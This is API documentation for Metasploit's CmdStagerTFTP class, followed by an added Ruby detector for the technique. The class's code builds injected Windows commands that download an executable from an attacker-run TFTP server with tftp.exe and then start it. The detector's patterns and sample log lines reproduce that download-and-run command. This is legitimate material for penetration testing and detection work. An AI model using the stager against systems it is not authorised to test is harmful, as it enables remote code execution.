Class: Rex::Exploitation::CmdStagerTFTP

Inherits:
CmdStagerBase
Defined in:
lib/rex/exploitation/cmdstager/tftp.rb

Overview

This class provides the ability to create a sequence of commands from an executable. When this sequence is run via command injection or a shell, the resulting exe will be written to disk and executed.

This particular version uses tftp.exe to download a binary from the specified server. The original file is preserved, not encoded at all, and so this version is significantly simpler than other methods.

Requires: tftp.exe, outbound UDP connectivity to a TFTP server

Written by Joshua J. Drake

Methods inherited from CmdStagerBase

#cmd_concat_operator, #encode_payload, #generate, #generate_cmds, #generate_cmds_decoder, #generate_cmds_payload, #parts_to_commands, #slice_up_payload

Constructor Details

#initialize(exe) ⇒ CmdStagerTFTP

Returns a new instance of CmdStagerTFTP.



# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 28

def initialize(exe)
  super
  @payload_exe = Rex::Text.rand_text_alpha(8) + ".exe"
end

Instance Attribute Details

#exe ⇒ Object (readonly)

NOTE: We don’t use a concatenation operator here since we only have a couple commands. There really isn’t any need to combine them. Also, the ms01_026 exploit depends on the start command being issued separately so that it can ignore it :)



# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 66

def exe
  @exe
end

#payload_exe ⇒ Object (readonly)

Returns the value of attribute payload_exe.



# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 67

def payload_exe
  @payload_exe
end

#tftp ⇒ Object

Returns the value of attribute tftp.



# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 68

def tftp
  @tftp
end

Instance Method Details

#compress_commands(cmds, opts) ⇒ Object

We override compress_commands just to stick in a few extra commands at the last second.



# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 48

def compress_commands(cmds, opts)
  # Initiate the download
  cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @payload_exe}"

  # Make it all happen
  cmds << "start #{@tempdir + @payload_exe}"

  # Clean up after unless requested not to..
  if (not opts[:nodelete])
    # XXX: We won't be able to delete the payload while it is running..
  end

  super
end
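
From the defender's side, the two commands appended above leave a recognizable pair in process-creation logs: a binary-mode `tftp -i <host> GET <name> <path>.exe` followed by a `start` of the same path. The following Ruby sketch is an added example, not Metasploit code; the log line format and the names `TFTP_GET`, `START_CMD`, `find_tftp_staging` and `SAMPLE_LOG` are assumptions, and the sample lines are constructed.

```ruby
# Added example (not Metasploit code): flag the command pair left by a TFTP
# command stager in process-creation logs.
# Assumed, constructed log format: "<epoch_seconds> <host> <command line>"

# Binary-mode TFTP download whose local destination is an .exe
TFTP_GET = /\btftp(?:\.exe)?\s+-i\s+(?<server>\S+)\s+get\s+(?<remote>\S+)\s+(?<dest>\S+\.exe)\b/i
# "start" of an .exe path
START_CMD = /\bstart\s+(?<path>\S+\.exe)\b/i

# Returns one hash per download that was followed, on the same host and within
# `window` seconds, by a start of the downloaded file.
def find_tftp_staging(lines, window: 60)
  pending = {} # [host, lowercased dest path] => download details
  hits = []
  lines.each do |line|
    ts, host, cmd = line.split(' ', 3)
    next if cmd.nil?
    time = Integer(ts, exception: false)
    next if time.nil? # skip lines without a numeric timestamp
    if (m = TFTP_GET.match(cmd))
      pending[[host, m[:dest].downcase]] = { time: time, server: m[:server], remote: m[:remote] }
    elsif (m = START_CMD.match(cmd))
      key = [host, m[:path].downcase]
      dl = pending[key]
      next unless dl && time - dl[:time] <= window
      hits << { host: host, server: dl[:server], remote: dl[:remote],
                path: m[:path], delay: time - dl[:time] }
      pending.delete(key)
    end
  end
  hits
end

# Constructed sample input
SAMPLE_LOG = [
  '1700000000 WS01 cmd.exe /c tftp -i 192.0.2.10 GET aB3dE9xZ C:\\Windows\\Temp\\QwErTyUi.exe',
  '1700000002 WS01 cmd.exe /c start C:\\Windows\\Temp\\QwErTyUi.exe',
  '1700000100 WS02 tftp -i 192.0.2.20 PUT report.txt',        # upload, not a download
  '1700000200 WS03 cmd.exe /c start C:\\Tools\\notepad2.exe', # start with no prior download
  '1700000300 WS04 tftp.exe -i 192.0.2.10 GET zz C:\\Temp\\a.exe',
  '1700000900 WS04 cmd.exe /c start C:\\Temp\\a.exe'          # outside the 60 s window
].freeze

find_tftp_staging(SAMPLE_LOG).each do |h|
  puts "#{h[:host]}: #{h[:path]} fetched from #{h[:server]} (#{h[:remote]}), started #{h[:delay]}s later"
end
```

Because the stager randomizes both the remote file name and the local .exe name, the correlation keys on the command shape and the shared destination path rather than on any fixed string.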

#setup(mod) ⇒ Object



# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 33

def setup(mod)
  # Assign through the accessor so that #teardown can reach the server later
  self.tftp = Rex::Proto::TFTP::Server.new
  tftp.register_file(Rex::Text.rand_text_alphanumeric(8), exe)
  tftp.start
  mod.add_socket(tftp) # Hating myself for doing it... but it's just a first demo
end

#teardown(mod = nil) ⇒ Object



# File 'lib/rex/exploitation/cmdstager/tftp.rb', line 40

def teardown(mod = nil)
  tftp.stop
end